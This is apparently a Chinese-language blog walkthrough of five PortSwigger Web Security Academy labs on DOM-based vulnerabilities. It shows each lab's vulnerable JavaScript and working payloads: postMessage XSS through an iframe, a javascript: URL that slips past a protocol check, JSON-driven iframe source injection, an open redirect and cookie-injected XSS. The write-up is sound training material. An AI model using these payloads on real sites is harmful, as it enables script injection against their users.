Burp Web Academy DOM-based Vulnerabilities

发表于 分类于

0x01. PortSwigger Web Security Academy

PortSwigger Web Security Academy 是 Burp Suite 官方推出的免费 Web 安全学习靶场,在学习 Web 安全知识的同时,还可以练习 Burp Suite 的实战技能。

本篇文章讲解 Web Security Academy 之中的 DOM-based Vulnerabilities(DOM 漏洞)。

0x02. DOM-based Vulnerabilities

2.1 Lab: DOM XSS using web messages

This lab demonstrates a simple web message vulnerability. To solve this lab, use the exploit server to post a message to the target site that causes the print() function to be called.

查看首页源代码,发现如下信息:

1
2
3
4
5
6
7
8
<!-- Ads to be inserted here -->
<div id='ads'>
</div>
<script>
    window.addEventListener('message', function(e) {
        document.getElementById('ads').innerHTML = e.data;
    })
</script>

要想给一个 Window 对象发送消息,我们首先需要有指向 Window 对象的引用。根据 MDN Web Docs 对 iframe 的介绍,我们可以通过 iframe.contentWindow 进行访问。此外,对 iframe 的访问还涉及到同源策略(Same-Origin Policy,SOP),如果是跨域访问,则 iframe 以及 iframe.contentWindow 的大部分属性都是不可访问的,不过 iframe.contentWindow 本身支持跨域访问,而且还可以调用 postMessage 方法发送消息。

尝试编写如下 Exploit 代码:

1
2
3
4
5
<iframe width=640 height=480 src='https://0ab700e30355cc4f86785836002c0078.web-security-academy.net/'></iframe>
<script>
  var iframe = document.querySelector('iframe');
  iframe.contentWindow.postMessage('<img src=1 onerror=print()>');
</script>

这是不行的,因为 iframe 是异步加载,所以执行代码中的 JavaScript 代码时,iframe 很可能还没加载完毕。换一种写法:

1
2
3
4
5
6
7
<iframe width=640 height=480 src='https://0ab700e30355cc4f86785836002c0078.web-security-academy.net/'></iframe>
<script>
  var iframe = document.querySelector('iframe');
  iframe.onload = function() {
    this.contentWindow.postMessage('<img src=1 onerror=print()>');
  }
</script>

这样仍然不行,postMessage 的语法如下:

1
2
3
4
5
postMessage(message)
postMessage(message, targetOrigin)
postMessage(message, targetOrigin, transfer)

postMessage(message, options)

如果 targetOrigin 留空,则默认接收方必须与发送方同源。因此,我们可以使用 *,表示对接收方没有任何限制。进一步改进如下:

1
2
3
4
5
6
7
<iframe width=640 height=480 src='https://0ab700e30355cc4f86785836002c0078.web-security-academy.net/'></iframe>
<script>
  var iframe = document.querySelector('iframe');
  iframe.onload = function() {
    this.contentWindow.postMessage('<img src=1 onerror=print()>', '*');
  }
</script>

2.2 Lab: DOM XSS using web messages and a JavaScript URL

This lab demonstrates a DOM-based redirection vulnerability that is triggered by web messaging. To solve this lab, construct an HTML page on the exploit server that exploits this vulnerability and calls the print() function.

首页存在如下代码:

1
2
3
4
5
6
7
8
<script>
    window.addEventListener('message', function(e) {
        var url = e.data;
        if (url.indexOf('http:') > -1 || url.indexOf('https:') > -1) {
            location.href = url;
        }
    }, false);
</script>

在前一题的基础上做就很简单了:

1
2
3
4
5
6
7
<iframe width=640 height=480 src='https://0a9c0000036361bb81ba2b10002800de.web-security-academy.net/'></iframe>
<script>
  var iframe = document.querySelector('iframe');
  iframe.onload = function() {
    this.contentWindow.postMessage('javascript:print()//http:', '*');
  }
</script>

注意这里添加 //http: 作为 JS 注释,以绕过协议关键字检查。

2.3 Lab: DOM XSS using web messages and JSON.parse

This lab uses web messaging and parses the message as JSON. To solve the lab, construct an HTML page on the exploit server that exploits this vulnerability and calls the print() function.

首页存在如下代码:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
<script>
    window.addEventListener('message', function(e) {
        var iframe = document.createElement('iframe'), ACMEplayer = {element: iframe}, d;
        document.body.appendChild(iframe);
        try {
            d = JSON.parse(e.data);
        } catch(e) {
            return;
        }
        switch(d.type) {
            case "page-load":
                ACMEplayer.element.scrollIntoView();
                break;
            case "load-channel":
                ACMEplayer.element.src = d.url;
                break;
            case "player-height-changed":
                ACMEplayer.element.style.width = d.width + "px";
                ACMEplayer.element.style.height = d.height + "px";
                break;
        }
    }, false);
</script>

注意这里 ACMEplayer.element 就是 iframe 对象,所以可以发消息修改 iframe.src,实现 XSS 调用 print()

1
2
3
4
5
6
7
<iframe width=640 height=480 src='https://0a20009503938167886e618500400085.web-security-academy.net/'></iframe>
<script>
  var iframe = document.querySelector('iframe');
  iframe.onload = function() {
    this.contentWindow.postMessage('{"type":"load-channel", "url":"javascript:print()"}', '*');
  }
</script>

注意,JSON 的字符串使用双引号而不是单引号。

2.4 Lab: DOM-based open redirection

This lab contains a DOM-based open-redirection vulnerability. To solve this lab, exploit this vulnerability and redirect the victim to the exploit server.

点击进入文章,右下角发现 Back to Blog,代码如下

1
2
3
4
5
<div class="is-linkback">
  <a href='#' onclick='returnUrl = /url=(https?:\/\/.+)/.exec(location); location.href = returnUrl ? returnUrl[1] : "/"'>
    Back to Blog
  </a>
</div>

访问如下页面:

1
https://0aed00eb0461142282dabae3006c002c.web-security-academy.net/post?postId=8&url=https://exploit-0acd001e044b1455824cb96501280005.exploit-server.net/

然后点击 Back to Blog 即可。

This lab demonstrates DOM-based client-side cookie manipulation. To solve this lab, inject a cookie that will cause XSS on a different page and call the print() function. You will need to use the exploit server to direct the victim to the correct pages.

进入一个商品页面,发现如下代码:

1
2
3
<script>
    document.cookie = 'lastViewedProduct=' + window.location + '; SameSite=None; Secure'
</script>

此时再访问首页,会附带如下 Cookie:

1
Cookie: session=eVfDIjRAlgoSFCVWPQFYM5Q1GJBEcxi1; lastViewedProduct=https://0ad900b40485d57d84106e3a006d0009.web-security-academy.net/product?productId=1

同时,首页右上角存在超链接 Last viewed product,即 Cookie 中 lastViewedProduct 指定的 URL,代码如下:

1
<a href='https://0ad900b40485d57d84106e3a006d0009.web-security-academy.net/product?productId=1'>Last viewed product</a>

尝试在这里进行注入操作:

1
https://0ad900b40485d57d84106e3a006d0009.web-security-academy.net/product?productId=1'><script>print()</script>

这样不行,因为 productId 是非法的,可以使用 & 或者 # 等绕过,比如:

1
https://0ad900b40485d57d84106e3a006d0009.web-security-academy.net/product?productId=1#'><script>print()</script>

完整的利用代码如下(首先注入 XSS Payload,然后访问首页,为了防止无限刷新加了一个标记):

1
2
3
4
<iframe
  src="https://0ad900b40485d57d84106e3a006d0009.web-security-academy.net/product?productId=1#'><script>print()</script>"
  onload="if(!window.x)this.src='https://0ad900b40485d57d84106e3a006d0009.web-security-academy.net/';window.x=1;"
></iframe>

0x03. 小结

  • iframe 相关特性
  • postMessage 相关特性
  • JSON 的字符串使用双引号而不是单引号

0x04. 参考文档

  1. https://portswigger.net/web-security/all-labs#dom-based-vulnerabilities
  2. https://developer.mozilla.org/en-US/docs/Web/HTML/Element/iframe
  3. https://developer.mozilla.org/en-US/docs/Web/API/HTMLIFrameElement/contentWindow
  4. https://developer.mozilla.org/en-US/docs/Web/API/Window/postMessage